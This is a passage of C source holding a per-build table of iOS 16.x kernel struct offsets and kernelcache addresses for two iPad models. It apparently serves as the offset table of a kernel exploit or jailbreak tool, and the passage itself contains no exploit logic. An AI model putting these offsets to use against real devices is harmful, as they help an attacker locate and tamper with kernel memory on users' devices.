._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aa01190, .kernelcache__gPhysBase = 0xfffffe00079a01b0, .kernelcache__gPhysSize = 0xfffffe00079a01b0 + 8, .kernelcache__gVirtBase = 0xfffffe000799e390, .kernelcache__perfmon_devices = 0xfffffe000aa3c3b0, .kernelcache__perfmon_dev_open = 0xfffffe00080b7cc4, .kernelcache__ptov_table = 0xfffffe00078eb3b8, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aa3b800, .kernelcache__vm_pages = 0xfffffe00078e80d0, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078ea368, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aa3b7f8, .kernelcache__vn_kqfilter = 0xfffffe000810a280, }, // iOS 16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:40:42 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8103", .build_version = "20E246", .device_id = "iPad13,11", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aacd208, .kernelcache__gPhysBase = 0xfffffe0007a7ffc0, .kernelcache__gPhysSize = 0xfffffe0007a7ffc0 + 8, .kernelcache__gVirtBase = 0xfffffe0007a7e198, .kernelcache__perfmon_devices = 0xfffffe000ab0b520, .kernelcache__perfmon_dev_open = 0xfffffe00080d03c0, .kernelcache__ptov_table = 0xfffffe00079cb188, .kernelcache__vm_first_phys_ppnum = 0xfffffe000ab0a990, .kernelcache__vm_pages = 0xfffffe00079c7eb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079ca128, .kernelcache__vm_page_array_ending_addr = 0xfffffe000ab0a988, .kernelcache__vn_kqfilter = 0xfffffe000811f2b4, }, // iOS 16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:40:42 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8103", .build_version = "20E252", .device_id = "iPad13,11", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aacd208, .kernelcache__gPhysBase = 0xfffffe0007a7ffc0, .kernelcache__gPhysSize = 0xfffffe0007a7ffc0 + 8, .kernelcache__gVirtBase = 0xfffffe0007a7e198, .kernelcache__perfmon_devices = 0xfffffe000ab0b520, .kernelcache__perfmon_dev_open = 0xfffffe00080d03c0, .kernelcache__ptov_table = 0xfffffe00079cb188, .kernelcache__vm_first_phys_ppnum = 0xfffffe000ab0a990, .kernelcache__vm_pages = 0xfffffe00079c7eb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079ca128, .kernelcache__vm_page_array_ending_addr = 0xfffffe000ab0a988, .kernelcache__vn_kqfilter = 0xfffffe000811f2b4, }, // iOS 16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:54 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8103", .build_version = "20F66", .device_id = "iPad13,11", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aad5288, .kernelcache__gPhysBase = 0xfffffe0007a84100, .kernelcache__gPhysSize = 0xfffffe0007a84100 + 8, .kernelcache__gVirtBase = 0xfffffe0007a822d8, .kernelcache__perfmon_devices = 0xfffffe000ab13520, .kernelcache__perfmon_dev_open = 0xfffffe00080d45c0, .kernelcache__ptov_table = 0xfffffe00079cf188, .kernelcache__vm_first_phys_ppnum = 0xfffffe000ab12990, .kernelcache__vm_pages = 0xfffffe00079cbeb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079ce128, .kernelcache__vm_page_array_ending_addr = 0xfffffe000ab12988, .kernelcache__vn_kqfilter = 0xfffffe000812374c, }, // iOS 16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:17:58 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8103", .build_version = "20G5026e", .device_id = "iPad13,11", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000ab85ab0, .kernelcache__gPhysBase = 0xfffffe0007a982a8, .kernelcache__gPhysSize = 0xfffffe0007a982a8 + 8, .kernelcache__gVirtBase = 0xfffffe0007a96460, .kernelcache__perfmon_devices = 0xfffffe000abc5550, .kernelcache__perfmon_dev_open = 0xfffffe00080f8dfc, .kernelcache__ptov_table = 0xfffffe00079e39c8, .kernelcache__vm_first_phys_ppnum = 0xfffffe000abc4910, .kernelcache__vm_pages = 0xfffffe00079e0108, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079e2968, .kernelcache__vm_page_array_ending_addr = 0xfffffe000abc4908, .kernelcache__vn_kqfilter = 0xfffffe0008147958, }, // iPad Air 5th // // iOS 16.2 { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:09:33 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8103", .build_version = "20C65", .device_id = "iPad13,16", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000a91d190, .kernelcache__gPhysBase = 0xfffffe00079840c8, .kernelcache__gPhysSize = 0xfffffe00079840c8 + 8, .kernelcache__gVirtBase = 0xfffffe00079822a8, .kernelcache__perfmon_devices = 0xfffffe000a9583b0, .kernelcache__perfmon_dev_open = 0xfffffe0008087f50, .kernelcache__ptov_table = 0xfffffe00078cf378, .kernelcache__vm_first_phys_ppnum = 0xfffffe000a957800, .kernelcache__vm_pages = 0xfffffe00078cc090, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078ce328, .kernelcache__vm_page_array_ending_addr = 0xfffffe000a9577f8, .kernelcache__vn_kqfilter = 0xfffffe00080da50c, }, // iOS 16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:19 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8103", .build_version = "20D47", .device_id = "iPad13,16", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000a925190, .kernelcache__gPhysBase = 0xfffffe00079841b0, .kernelcache__gPhysSize = 0xfffffe00079841b0 + 8, .kernelcache__gVirtBase = 0xfffffe0007982390, .kernelcache__perfmon_devices = 0xfffffe000a9603b0, .kernelcache__perfmon_dev_open = 0xfffffe0008087cc4, .kernelcache__ptov_table = 0xfffffe00078cf3b8, .kernelcache__vm_first_phys_ppnum = 0xfffffe000a95f800, .kernelcache__vm_pages = 0xfffffe00078cc0d0, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078ce368, .kernelcache__vm_page_array_ending_addr = 0xfffffe000a95f7f8, .kernelcache__vn_kqfilter = 0xfffffe00080da280, }, // iOS 16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:19 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8103", .build_version = "20D67", .device_id = "iPad13,16", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000a925190, .kernelcache__gPhysBase = 0xfffffe00079841b0, .kernelcache__gPhysSize = 0xfffffe00079841b0 + 8, .kernelcache__gVirtBase = 0xfffffe0007982390, .kernelcache__perfmon_devices = 0xfffffe000a9603b0, .kernelcache__perfmon_dev_open = 0xfffffe0008087cc4, .kernelcache__ptov_table = 0xfffffe00078cf3b8, .kernelcache__vm_first_phys_ppnum = 0xfffffe000a95f800, .kernelcache__vm_pages = 0xfffffe00078cc0d0, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078ce368, .kernelcache__vm_page_array_ending_addr = 0xfffffe000a95f7f8, .kernelcache__vn_kqfilter = 0xfffffe00080da280, }, // iOS 16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:40:42 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8103", .build_version = "20E246", .device_id = "iPad13,16", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000a9f1208, .kernelcache__gPhysBase = 0xfffffe0007a63fc0, .kernelcache__gPhysSize = 0xfffffe0007a63fc0 + 8, .kernelcache__gVirtBase = 0xfffffe0007a62198, .kernelcache__perfmon_devices = 0xfffffe000aa2f520, .kernelcache__perfmon_dev_open = 0xfffffe00080a43c0, .kernelcache__ptov_table = 0xfffffe00079af188, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aa2e990, .kernelcache__vm_pages = 0xfffffe00079abeb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079ae128, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aa2e988, .kernelcache__vn_kqfilter = 0xfffffe00080f32b4, }, // iOS 16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:40:42 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8103", .build_version = "20E252", .device_id = "iPad13,16", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 